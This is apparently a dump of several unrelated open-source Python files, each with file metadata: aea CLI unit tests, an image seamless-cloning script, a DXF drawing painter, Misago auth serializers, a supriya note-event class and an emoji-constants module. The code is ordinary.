exists_mock.assert_called_once_with("dir-name")
makedirs_mock.assert_called_once_with("dir-name")
@mock.patch("aea.cli.utils.config.get_or_create_cli_config")
@mock.patch("aea.cli.utils.generic.yaml.dump")
@mock.patch("builtins.open", mock.mock_open())
class UpdateCLIConfigTestCase(TestCase):
"""Test case for update_cli_config method."""
def testupdate_cli_config_positive(self, dump_mock, icf_mock):
"""Test for update_cli_config method positive result."""
update_cli_config({"some": "config"})
icf_mock.assert_called_once()
dump_mock.assert_called_once()
def _raise_yamlerror(*args):
raise YAMLError()
def _raise_file_not_found_error(*args):
raise FileNotFoundError()
@mock.patch("builtins.open", mock.mock_open())
class GetOrCreateCLIConfigTestCase(TestCase):
"""Test case for read_cli_config method."""
@mock.patch(
"aea.cli.utils.generic.yaml.safe_load", return_value={"correct": "output"}
)
def testget_or_create_cli_config_positive(self, safe_load_mock):
"""Test for get_or_create_cli_config method positive result."""
result = get_or_create_cli_config()
expected_result = {"correct": "output"}
self.assertEqual(result, expected_result)
safe_load_mock.assert_called_once()
@mock.patch("aea.cli.utils.generic.yaml.safe_load", _raise_yamlerror)
def testget_or_create_cli_config_bad_yaml(self):
"""Test for rget_or_create_cli_config method bad yaml behavior."""
with self.assertRaises(ClickException):
get_or_create_cli_config()
class CleanAfterTestCase(TestCase):
"""Test case for clean_after decorator method."""
@mock.patch("aea.cli.utils.decorators.os.path.exists", return_value=True)
@mock.patch("aea.cli.utils.decorators._cast_ctx", lambda x: x)
@mock.patch("aea.cli.utils.decorators.shutil.rmtree")
def test_clean_after_positive(self, rmtree_mock, *mocks):
"""Test clean_after decorator method for positive result."""
@clean_after
def func(click_context):
ctx = cast(Context, click_context.obj)
ctx.clean_paths.append("clean/path")
raise ClickException("Message")
with self.assertRaises(ClickException):
func(ContextMock())
rmtree_mock.assert_called_once_with("clean/path")
@mock.patch("aea.cli.utils.package_utils.click.echo", raise_stoptest)
class ValidateAuthorNameTestCase(TestCase):
"""Test case for validate_author_name method."""
@mock.patch(
"aea.cli.utils.package_utils.click.prompt", return_value="correct_author"
)
def test_validate_author_name_positive(self, prompt_mock):
"""Test validate_author_name for positive result."""
author = "valid_author"
result = validate_author_name(author=author)
self.assertEqual(result, author)
result = validate_author_name()
self.assertEqual(result, "correct_author")
prompt_mock.assert_called_once()
@mock.patch(
"aea.cli.utils.package_utils.click.prompt", return_value="inv@l1d_@uth&r"
)
def test_validate_author_name_negative(self, prompt_mock):
"""Test validate_author_name for negative result."""
with self.assertRaises(StopTest):
validate_author_name()
prompt_mock.return_value = "skills"
with self.assertRaises(StopTest):
validate_author_name()
class ValidatePackageNameTestCase(TestCase):
"""Test case for validate_package_name method."""
def test_validate_package_name_positive(self):
"""Test validate_package_name for positive result."""
validate_package_name("correct_name")
def test_validate_package_name_negative(self):
"""Test validate_package_name for negative result."""
with self.assertRaises(BadParameter):
validate_package_name("incorrect-name")
def _raise_validation_error(*args, **kwargs):
raise ValidationError("Message.")
class FindItemLocallyTestCase(TestCase):
"""Test case for find_item_locally method."""
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=True)
@mock.patch(
"aea.cli.utils.package_utils.ConfigLoader.from_configuration_type",
_raise_validation_error,
)
def test_find_item_locally_bad_config(self, *mocks):
"""Test find_item_locally for bad config result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_locally(ContextMock(), "skill", public_id)
self.assertIn("configuration file not valid", cm.exception.message)
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=True)
@mock.patch("aea.cli.utils.package_utils.Path.open", mock.mock_open())
@mock.patch(
"aea.cli.utils.package_utils.ConfigLoader.from_configuration_type",
return_value=ConfigLoaderMock(),
)
def test_find_item_locally_cant_find(self, from_conftype_mock, *mocks):
"""Test find_item_locally for can't find result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_locally(ContextMock(), "skill", public_id)
self.assertEqual(
cm.exception.message, "Cannot find skill with author and version specified."
)
class FindItemInDistributionTestCase(TestCase):
"""Test case for find_item_in_distribution method."""
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=True)
@mock.patch(
"aea.cli.utils.package_utils.ConfigLoader.from_configuration_type",
_raise_validation_error,
)
def testfind_item_in_distribution_bad_config(self, *mocks):
"""Test find_item_in_distribution for bad config result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_in_distribution(ContextMock(), "skill", public_id)
self.assertIn("configuration file not valid", cm.exception.message)
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=False)
def testfind_item_in_distribution_not_found(self, *mocks):
"""Test find_item_in_distribution for not found result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_in_distribution(ContextMock(), "skill", public_id)
self.assertIn("Cannot find skill", cm.exception.message)
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=True)
@mock.patch("aea.cli.utils.package_utils.Path.open", mock.mock_open())
@mock.patch(
"aea.cli.utils.package_utils.ConfigLoader.from_configuration_type",
return_value=ConfigLoaderMock(),
)
def testfind_item_in_distribution_cant_find(self, from_conftype_mock, *mocks):
"""Test find_item_locally for can't find result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_in_distribution(ContextMock(), "skill", public_id)
self.assertEqual(
cm.exception.message, "Cannot find skill with author and version specified."
)
class ValidateConfigConsistencyTestCase(TestCase):
"""Test case for _validate_config_consistency method."""
@mock.patch("aea.cli.utils.config.Path.exists", _raise_validation_error)
def test__validate_config_consistency_cant_find(self, *mocks):
"""Test _validate_config_consistency can't find result"""
with self.assertRaises(ValueError) as cm:
_validate_config_consistency(ContextMock(protocols=["some"]))
self.assertIn("Cannot find", str(cm.exception))
@mock.patch(
"aea.cli.utils.package_utils._compute_fingerprint",
return_value={"correct": "fingerprint"},
)
class IsFingerprintCorrectTestCase(TestCase):
"""Test case for adding skill with invalid fingerprint."""
def test_is_fingerprint_correct_positive(self, *mocks):
"""Test is_fingerprint_correct method for positive result."""
item_config = mock.Mock()
item_config.fingerprint = {"correct": "fingerprint"}
item_config.fingerprint_ignore_patterns = []
result = is_fingerprint_correct("package_path", item_config)
self.assertTrue(result)
def test_is_fingerprint_correct_negative(self, *mocks):
"""Test is_fingerprint_correct method for negative result."""
item_config = mock.Mock()
item_config.fingerprint = {"incorrect": "fingerprint"}
item_config.fingerprint_ignore_patterns = []
package_path = "package_dir"
result = is_fingerprint_correct(package_path, item_config)
self.assertFalse(result)
@mock.patch("aea.cli.config.click.ParamType")
class AEAJsonPathTypeTestCase(TestCase):
"""Test case for AEAJsonPathType class."""
@mock.patch("aea.cli.utils.click_utils.Path.exists", return_value=True)
def test_convert_root_vendor_positive(self, *mocks):
"""Test for convert method with root "vendor" positive result."""
value = "vendor.author.protocols.package_name.attribute_name"
ctx_mock = ContextMock()
ctx_mock.obj = mock.Mock()
ctx_mock.obj.set_config = mock.Mock()
obj = AEAJsonPathType()
obj.convert(value, "param", ctx_mock)
@mock.patch("aea.cli.utils.click_utils.Path.exists", return_value=False)
def test_convert_root_vendor_path_not_exists(self, *mocks):
"""Test for convert method with root "vendor" path not exists."""
value = "vendor.author.protocols.package_name.attribute_name"
obj = AEAJsonPathType()
with self.assertRaises(BadParameter):
obj.convert(value, "param", "ctx")
@mock.patch("aea.cli.utils.package_utils.LedgerApis", mock.MagicMock())
class TryGetBalanceTestCase(TestCase):
"""Test case for try_get_balance method."""
def test_try_get_balance_positive(self):
"""Test for try_get_balance method positive result."""
agent_config = mock.Mock()
agent_config.default_ledger_config = FETCHAI
wallet_mock = mock.Mock()
wallet_mock.addresses = {FETCHAI: "some-adress"}
try_get_balance(agent_config, wallet_mock, FETCHAI)
@mock.patch("aea.cli.utils.generic.os.path.exists", return_value=True)
class IsReadmePresentTestCase(TestCase):
"""Test case for is_readme_present method."""
def test_is_readme_present_positive(self, *mocks):
"""Test is_readme_present for positive result."""
self.assertTrue(is_readme_present("readme/path"))
| 39.206089
| 88
| 0.696792
| 2,063
| 16,741
| 5.383907
| 0.128454
| 0.024309
| 0.043576
| 0.049968
| 0.588998
| 0.494103
| 0.439092
| 0.395696
| 0.338795
| 0.311245
| 0
| 0.002403
| 0.179798
| 16,741
| 426
| 89
| 39.298122
| 0.806496
| 0.173227
| 0
| 0.293478
| 0
| 0
| 0.201941
| 0.124871
| 0
| 0
| 0
| 0
| 0.155797
| 1
| 0.112319
| false
| 0
| 0.054348
| 0
| 0.228261
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88019b110382885f8543e3444fa6b00a5c38b567
| 3,691
|
py
|
Python
|
run_clone.py
|
tGhattas/IMP-seamless-cloning
|
2c81e0bd9bc99955afe06ec4eea187a5a42761e3
|
[
"MIT"
] | null | null | null |
run_clone.py
|
tGhattas/IMP-seamless-cloning
|
2c81e0bd9bc99955afe06ec4eea187a5a42761e3
|
[
"MIT"
] | null | null | null |
run_clone.py
|
tGhattas/IMP-seamless-cloning
|
2c81e0bd9bc99955afe06ec4eea187a5a42761e3
|
[
"MIT"
] | null | null | null |
import cv2
import getopt
import sys
from gui import MaskPainter, MaskMover
from clone import seamless_cloning, shepards_seamless_cloning
from utils import read_image, plt
from os import path
def usage():
print(
"Usage: python run_clone.py [options] \n\n\
Options: \n\
\t-h\t Flag to specify a brief help message and exits..\n\
\t-s\t(Required) Specify a source image.\n\
\t-t\t(Required) Specify a target image.\n\
\t-m\t(Optional) Specify a mask image with the object in white and other part in black, ignore this option if you plan to draw it later.\n\
\t-x\t(Optional) Flag to specify a mode, either 'possion' or 'shepard'. default is possion.\n\
\t-v\t(Optional) Flag to specify grad field of source only or both in case of Possion solver is used. default is source only.")
if __name__ == '__main__':
# parse command line arguments
args = {}
try:
opts, _ = getopt.getopt(sys.argv[1:], "vxhs:t:m:p:")
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
print("See help: run_clone.py -h")
exit(2)
for o, a in opts:
if o in ("-h"):
usage()
exit()
elif o in ("-s"):
args["source"] = a
elif o in ("-t"):
args["target"] = a
elif o in ("-m"):
args["mask"] = a
elif o in ("-x"):
args["mode"] = a.lower()
elif o in ("-v"):
args["gradient_field_source_only"] = a
else:
continue
#
if ("source" not in args) or ("target" not in args):
usage()
exit()
#
# set default mode to Possion solver
mode = "poisson" if ("mode" not in args) else args["mode"]
gradient_field_source_only = ("gradient_field_source_only" not in args)
source = read_image(args["source"], 2)
target = read_image(args["target"], 2)
if source is None or target is None:
print('Source or target image not exist.')
exit()
if source.shape[0] > target.shape[0] or source.shape[1] > target.shape[1]:
print('Source image cannot be larger than target image.')
exit()
# draw the mask
mask_path = ""
if "mask" not in args:
print('Please highlight the object to disapparate.\n')
mp = MaskPainter(args["source"])
mask_path = mp.paint_mask()
else:
mask_path = args["mask"]
# adjust mask position for target image
print('Please move the object to desired location to apparate.\n')
mm = MaskMover(args["target"], mask_path)
offset_x, offset_y, target_mask_path = mm.move_mask()
# blend
print('Blending ...')
target_mask = read_image(target_mask_path, 1)
offset = offset_x, offset_y
cloning_tool = seamless_cloning if mode == "poisson" else shepards_seamless_cloning
kwargs = {"gradient_field_source_only": gradient_field_source_only} if mode == "poisson" else {}
blend_result = cloning_tool(source, target, target_mask, offset, **kwargs)
cv2.imwrite(path.join(path.dirname(args["source"]), 'target_result.png'),
blend_result)
plt.figure("Result"), plt.imshow(blend_result), plt.show()
print('Done.\n')
'''
running example:
- Possion based solver:
python run_clone.py -s external/blend-1.jpg -t external/main-1.jpg
python run_clone.py -s external/source3.jpg -t external/target3.jpg -v
- Shepard's interpolation:
python run_clone.py -s external/blend-1.jpg -t external/main-1.jpg -x
python run_clone.py -s external/source3.jpg -t external/target3.jpg -x
'''
| 33.554545
| 147
| 0.629098
| 538
| 3,691
| 4.200743
| 0.289963
| 0.030973
| 0.026549
| 0.035398
| 0.153097
| 0.133628
| 0.133628
| 0.133628
| 0.09292
| 0.09292
| 0
| 0.006874
| 0.251151
| 3,691
| 110
| 148
| 33.554545
| 0.810781
| 0.056082
| 0
| 0.108108
| 0
| 0.040541
| 0.151379
| 0.025016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013514
| false
| 0
| 0.094595
| 0
| 0.108108
| 0.121622
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88044ce700e39ec36bb7ba44d3c9905b593ae3a4
| 4,460
|
py
|
Python
|
painter.py
|
MikhailNakhatovich/rooms_painting
|
51b92797c867d4bb1c8d42a58785c0f4dacd4075
|
[
"MIT"
] | null | null | null |
painter.py
|
MikhailNakhatovich/rooms_painting
|
51b92797c867d4bb1c8d42a58785c0f4dacd4075
|
[
"MIT"
] | null | null | null |
painter.py
|
MikhailNakhatovich/rooms_painting
|
51b92797c867d4bb1c8d42a58785c0f4dacd4075
|
[
"MIT"
] | null | null | null |
import cv2
import ezdxf
import numpy as np
def draw_hatch(img, entity, color, mask):
for poly_path in entity.paths.paths:
# print(poly_path.path_type_flags)
polygon = np.array([vertex[:-1] for vertex in poly_path.vertices]).astype(int)
if poly_path.path_type_flags & 1 == 1:
cv2.fillPoly(img, [polygon], color)
cv2.fillPoly(mask, [polygon], (255, 255, 255))
else:
cv2.fillPoly(img, [polygon], (255, 255, 255))
return color
def draw_line(img, entity, color, mask):
p1 = entity.dxf.start[:-1]
p2 = entity.dxf.end[:-1]
cv2.line(img, (int(p1[0]), int(p1[1])), (int(p2[0]), int(p2[1])), color, 1)
cv2.line(mask, (int(p1[0]), int(p1[1])), (int(p2[0]), int(p2[1])), (255, 255, 255), 2)
return color
def draw_lwpolyline(img, entity, color, mask):
polyline = []
a = np.array(entity.lwpoints.values).astype(int)
while len(a) > 0:
polyline.append((a[0], a[1]))
a = a[5:]
cv2.polylines(img, [np.array(polyline)], entity.closed, color, 1)
cv2.polylines(mask, [np.array(polyline)], entity.closed, (255, 255, 255), 2)
return color
def draw_arc(img, entity, color, mask):
s = entity.dxf.start_angle * np.pi / 180
e = entity.dxf.end_angle * np.pi / 180
if s > e:
s -= 2 * np.pi
d = (e - s) / (int((e - s) * 180 / np.pi) + 1)
r = entity.dxf.radius
cx, cy = entity.dxf.center.xyz[:-1]
angles = np.arange(s, e + d / 2, d)
x = cx + r * np.cos(angles)
y = cy + r * np.sin(angles)
points = np.column_stack((x, y)).astype(int)
cv2.polylines(img, [points], abs(s - e) < 1e-9, color, 1)
cv2.polylines(mask, [points], abs(s - e) < 1e-9, (255, 255, 255), 2)
return color
def draw_circle(img, entity, color, mask):
r = entity.dxf.radius
cx, cy = entity.dxf.center.xyz[:-1]
cv2.circle(img, (int(cx), int(cy)), int(r), color, 1)
cv2.circle(mask, (int(cx), int(cy)), int(r), (255, 255, 255), -1)
return color
def draw_ellipse(img, entity, color, mask):
cx, cy = entity.dxf.center.xyz[:-1]
ma = entity.dxf.major_axis.magnitude
angle = entity.dxf.major_axis.angle_deg
mi = ma * entity.dxf.ratio
s = entity.dxf.start_param * 180 / np.pi
e = entity.dxf.end_param * 180 / np.pi
if entity.dxf.extrusion.z == -1:
s = 360 - s
e = 360 - e
cv2.ellipse(img, (int(cx), int(cy)), (int(ma), int(mi)), angle, s, e, color, 1)
cv2.ellipse(mask, (int(cx), int(cy)), (int(ma), int(mi)), angle, s, e, (255, 255, 255), 1)
return color
def draw_point(img, entity, color, mask):
cx, cy = entity.dxf.location.xyz[:-1]
cv2.circle(img, (int(cx), int(cy)), 0, color, 1)
cv2.circle(mask, (int(cx), int(cy)), 0, (255, 255, 255), -1)
return color
draw_map = {
'HATCH': draw_hatch,
'LINE': draw_line,
'LWPOLYLINE': draw_lwpolyline,
'ARC': draw_arc,
'CIRCLE': draw_circle,
'ELLIPSE': draw_ellipse,
'POINT': draw_point,
}
def paint(in_path, out_path, config):
doc = ezdxf.readfile(in_path)
extmax, extmin = doc.header['$EXTMAX'], doc.header['$EXTMIN']
xmin, ymin = np.floor(extmin[:-1]).astype(int)
xmax, ymax = np.ceil(extmax[:-1]).astype(int)
img = np.ones((ymax + ymin, xmax + xmin, 3), np.uint8) * 255
mask = np.zeros_like(img)
msp = doc.modelspace()
layers = config.get('layers', {})
colors = config.get('colors', {})
# print(doc.layers.entries.keys())
for layer_name, names in layers.items():
color = tuple(colors.get(layer_name, [0, 0, 0]))
for name in names:
if name not in doc.layers:
continue
entities = msp.query('*[layer=="%s"]' % name)
tmp = np.zeros((ymax + ymin, xmax + xmin), np.uint8)
for entity in entities:
if entity.DXFTYPE in draw_map:
draw_map[entity.DXFTYPE](img, entity, color, tmp)
else:
print("%s: %s" % (name, entity.DXFTYPE))
contours, hierarchy = cv2.findContours(tmp, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(mask, contours, -1, color, -1)
res, img_png = cv2.imencode('.png', cv2.flip(img, 0))
res, mask_png = cv2.imencode('.png', cv2.flip(mask, 0))
with open(out_path, 'wb') as f:
f.write(img_png.tobytes())
with open(out_path[:-4] + "_mask.png", 'wb') as f:
f.write(mask_png.tobytes())
| 35.11811
| 99
| 0.578924
| 686
| 4,460
| 3.69242
| 0.218659
| 0.0379
| 0.044216
| 0.049743
| 0.305567
| 0.240821
| 0.196605
| 0.192657
| 0.11291
| 0.071062
| 0
| 0.054997
| 0.241704
| 4,460
| 126
| 100
| 35.396825
| 0.693968
| 0.014574
| 0
| 0.133333
| 0
| 0
| 0.024362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.07619
| false
| 0
| 0.028571
| 0
| 0.171429
| 0.009524
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8804685e3bac745bbfacb5b5cab8b6e032a05238
| 3,064
|
py
|
Python
|
misago/misago/users/serializers/auth.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | 2
|
2021-03-06T21:06:13.000Z
|
2021-03-09T15:05:12.000Z
|
misago/misago/users/serializers/auth.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
misago/misago/users/serializers/auth.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework import serializers
from ...acl.useracl import serialize_user_acl
from .user import UserSerializer
User = get_user_model()
__all__ = ["AuthenticatedUserSerializer", "AnonymousUserSerializer"]
class AuthFlags:
def get_is_authenticated(self, obj):
return bool(obj.is_authenticated)
def get_is_anonymous(self, obj):
return bool(obj.is_anonymous)
class AuthenticatedUserSerializer(UserSerializer, AuthFlags):
email = serializers.SerializerMethodField()
is_authenticated = serializers.SerializerMethodField()
is_anonymous = serializers.SerializerMethodField()
class Meta:
model = User
fields = UserSerializer.Meta.fields + [
"has_usable_password",
"is_hiding_presence",
"limits_private_thread_invites_to",
"unread_private_threads",
"subscribe_to_started_threads",
"subscribe_to_replied_threads",
"is_authenticated",
"is_anonymous",
]
def get_acl(self, obj):
acl = self.context.get("acl")
if acl:
return serialize_user_acl(acl)
return {}
def get_email(self, obj):
return obj.email
def get_api(self, obj):
return {
"avatar": reverse("misago:api:user-avatar", kwargs={"pk": obj.pk}),
"data_downloads": reverse(
"misago:api:user-data-downloads", kwargs={"pk": obj.pk}
),
"details": reverse("misago:api:user-details", kwargs={"pk": obj.pk}),
"change_email": reverse(
"misago:api:user-change-email", kwargs={"pk": obj.pk}
),
"change_password": reverse(
"misago:api:user-change-password", kwargs={"pk": obj.pk}
),
"edit_details": reverse(
"misago:api:user-edit-details", kwargs={"pk": obj.pk}
),
"options": reverse("misago:api:user-forum-options", kwargs={"pk": obj.pk}),
"request_data_download": reverse(
"misago:api:user-request-data-download", kwargs={"pk": obj.pk}
),
"username": reverse("misago:api:user-username", kwargs={"pk": obj.pk}),
"delete": reverse(
"misago:api:user-delete-own-account", kwargs={"pk": obj.pk}
),
}
AuthenticatedUserSerializer = AuthenticatedUserSerializer.exclude_fields(
"is_avatar_locked",
"is_blocked",
"is_followed",
"is_signature_locked",
"meta",
"signature",
"status",
)
class AnonymousUserSerializer(serializers.Serializer, AuthFlags):
id = serializers.ReadOnlyField()
acl = serializers.SerializerMethodField()
is_authenticated = serializers.SerializerMethodField()
is_anonymous = serializers.SerializerMethodField()
def get_acl(self, obj):
acl = self.context.get("acl")
if acl:
return serialize_user_acl(acl)
return {}
| 31.587629
| 87
| 0.616841
| 310
| 3,064
| 5.903226
| 0.251613
| 0.071038
| 0.087432
| 0.10929
| 0.329508
| 0.236066
| 0.212022
| 0.212022
| 0.212022
| 0.212022
| 0
| 0
| 0.262402
| 3,064
| 96
| 88
| 31.916667
| 0.809735
| 0
| 0
| 0.253165
| 0
| 0
| 0.234987
| 0.152415
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075949
| false
| 0.037975
| 0.063291
| 0.050633
| 0.379747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8805528dd519906fc019a797eb45969b31e9b633
| 7,470
|
py
|
Python
|
supriya/patterns/NoteEvent.py
|
deeuu/supriya
|
14fcb5316eccb4dafbe498932ceff56e1abb9d27
|
[
"MIT"
] | null | null | null |
supriya/patterns/NoteEvent.py
|
deeuu/supriya
|
14fcb5316eccb4dafbe498932ceff56e1abb9d27
|
[
"MIT"
] | null | null | null |
supriya/patterns/NoteEvent.py
|
deeuu/supriya
|
14fcb5316eccb4dafbe498932ceff56e1abb9d27
|
[
"MIT"
] | null | null | null |
import uuid
import supriya.commands
import supriya.realtime
from supriya.patterns.Event import Event
class NoteEvent(Event):
### CLASS VARIABLES ###
__slots__ = ()
### INITIALIZER ###
def __init__(
self,
add_action=None,
delta=None,
duration=None,
is_stop=True,
synthdef=None,
target_node=None,
uuid=None,
**settings,
):
if add_action is not None:
add_action = supriya.AddAction.from_expr(add_action)
Event.__init__(
self,
add_action=add_action,
delta=delta,
duration=duration,
is_stop=bool(is_stop),
synthdef=synthdef,
target_node=target_node,
uuid=uuid,
**settings,
)
### PRIVATE METHODS ###
def _perform_nonrealtime(self, session, uuids, offset, maximum_offset=None):
import supriya.assets.synthdefs
settings = self.settings.copy() # Do not mutate in place.
synthdef = self.get("synthdef", supriya.assets.synthdefs.default)
synthdef = synthdef or supriya.assets.synthdefs.default
synth_uuid = self.get("uuid", uuid.uuid4())
is_stop = self.get("is_stop")
duration = self.get("duration")
if duration is None:
duration = 1
if "duration" in settings:
duration = settings.pop("duration")
dictionaries = self._expand(
settings, synthdef, uuids, realtime=False, synth_parameters_only=True
)
if synth_uuid not in uuids:
# Begin a Pbind or Pmono synth
target_node = self["target_node"]
if isinstance(target_node, uuid.UUID) and target_node in uuids:
target_node = uuids[target_node]
prototype = (supriya.nonrealtime.Session, supriya.nonrealtime.Node)
if not isinstance(target_node, prototype):
target_node = session
synths = []
with session.at(offset):
for dictionary in dictionaries:
synth = target_node.add_synth(
add_action=self["add_action"],
duration=duration,
synthdef=synthdef,
**dictionary,
)
synths.append(synth)
if not is_stop:
uuids[synth_uuid] = tuple(synths)
else:
# Extend and make settings on a Pmono synth
synths = uuids[synth_uuid]
stop_offset = offset + duration
for synth, dictionary in zip(synths, dictionaries):
duration = stop_offset - synth.start_offset
synth.set_duration(duration)
with session.at(offset):
for key, value in dictionary.items():
synth[key] = value
return offset + max(self.delta, self.get("duration", 0))
def _perform_realtime(self, index=0, server=None, timestamp=0, uuids=None):
import supriya.assets.synthdefs
import supriya.patterns
synth_uuid = self.get("uuid") or uuid.uuid4()
synthdef = self.get("synthdef", supriya.assets.synthdefs.default)
synthdef = synthdef or supriya.assets.synthdefs.default
is_stop = self.get("is_stop")
duration = self["duration"]
if duration is None:
duration = 1
dictionaries = self._expand(self.settings, synthdef, uuids)
first_visit = False
if synth_uuid not in uuids:
first_visit = True
node_ids = {
server.node_id_allocator.allocate_node_id(): None
for _ in range(len(dictionaries))
}
uuids[synth_uuid] = node_ids
start_product = self._build_start_bundle(
dictionaries, first_visit, index, synth_uuid, synthdef, timestamp, uuids
)
if self.get("duration"):
if is_stop:
stop_product = self._build_stop_bundle(
index, synth_uuid, synthdef, timestamp, uuids
)
else:
stop_product = supriya.patterns.EventProduct(
event=None,
index=index,
is_stop=True,
requests=(),
timestamp=timestamp + duration,
uuid=None,
)
return [start_product, stop_product]
else:
uuids.pop(synth_uuid)
return [start_product]
def _build_start_bundle(
self, dictionaries, first_visit, index, synth_uuid, synthdef, timestamp, uuids
):
import supriya.patterns
requests = []
node_ids = uuids[synth_uuid]
if first_visit:
for node_id, dictionary in zip(node_ids, dictionaries):
add_action = dictionary.pop("add_action")
target_node = dictionary.pop("target_node")
if target_node is None:
target_node = 1
synth_kwargs = {
key: value
for key, value in dictionary.items()
if key in synthdef.parameter_names
}
request = supriya.commands.SynthNewRequest(
add_action=add_action,
node_id=node_id,
synthdef=synthdef,
target_node_id=target_node,
**synth_kwargs,
)
requests.append(request)
synth = supriya.realtime.Synth(synthdef)
node_ids[node_id] = synth
else:
for node_id, dictionary in zip(node_ids, dictionaries):
synth_kwargs = {
key: value
for key, value in dictionary.items()
if key in synthdef.parameter_names
}
request = supriya.commands.NodeSetRequest(
node_id=node_id, **synth_kwargs
)
requests.append(request)
event_product = supriya.patterns.EventProduct(
event=self,
index=index,
is_stop=False,
requests=requests,
timestamp=timestamp,
uuid=synth_uuid,
)
return event_product
def _build_stop_bundle(self, index, synth_uuid, synthdef, timestamp, uuids):
import supriya.patterns
import supriya.synthdefs
duration = self["duration"]
if duration is None:
duration = 1
requests = []
timestamp = timestamp + duration
node_ids = sorted(uuids[synth_uuid])
if synthdef.has_gate:
for node_id in node_ids:
request = supriya.commands.NodeSetRequest(node_id=node_id, gate=0)
requests.append(request)
elif any(x >= supriya.DoneAction.FREE_SYNTH for x in synthdef.done_actions):
pass
else:
request = supriya.commands.NodeFreeRequest(node_ids=node_ids)
requests.append(request)
event_product = supriya.patterns.EventProduct(
event=self,
index=index,
is_stop=True,
requests=requests,
timestamp=timestamp,
uuid=synth_uuid,
)
return event_product
| 35.571429
| 86
| 0.545382
| 740
| 7,470
| 5.306757
| 0.163514
| 0.045837
| 0.033613
| 0.029539
| 0.403871
| 0.346066
| 0.310924
| 0.302521
| 0.270945
| 0.176725
| 0
| 0.00215
| 0.377242
| 7,470
| 209
| 87
| 35.741627
| 0.842003
| 0.018876
| 0
| 0.409574
| 0
| 0
| 0.018612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026596
| false
| 0.005319
| 0.053191
| 0
| 0.117021
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88055aadf736a00daf291c08df0121953d6b59c8
| 443
|
py
|
Python
|
emoji_utils.py
|
ApacheAA/LastSeen
|
1fe675b3ee3072d56e9fe094d1d80e1f7d876215
|
[
"MIT"
] | null | null | null |
emoji_utils.py
|
ApacheAA/LastSeen
|
1fe675b3ee3072d56e9fe094d1d80e1f7d876215
|
[
"MIT"
] | null | null | null |
emoji_utils.py
|
ApacheAA/LastSeen
|
1fe675b3ee3072d56e9fe094d1d80e1f7d876215
|
[
"MIT"
] | 1
|
2021-04-04T02:46:10.000Z
|
2021-04-04T02:46:10.000Z
|
# unicode digit emojis
# digits from '0' to '9'
zero_digit_code = zd = 48
# excluded digits
excl_digits = [2, 4, 5, 7]
# unicode digit keycap
udkc = '\U0000fe0f\U000020e3'
hours_0_9 = [chr(i) + udkc for i in range(zd, zd + 10)
if i - zd not in excl_digits]
# number '10' emoji
hours_0_9.append('\U0001f51f')
# custom emojis from '11' to '23'
hours_11_23 = [str(i) for i in range(11, 24)]
vote = ('PLUS', 'MINUS')
edit = '\U0001F4DD'
| 26.058824
| 54
| 0.654628
| 77
| 443
| 3.636364
| 0.584416
| 0.085714
| 0.05
| 0.078571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143258
| 0.196388
| 443
| 17
| 55
| 26.058824
| 0.643258
| 0.293454
| 0
| 0
| 0
| 0
| 0.159609
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
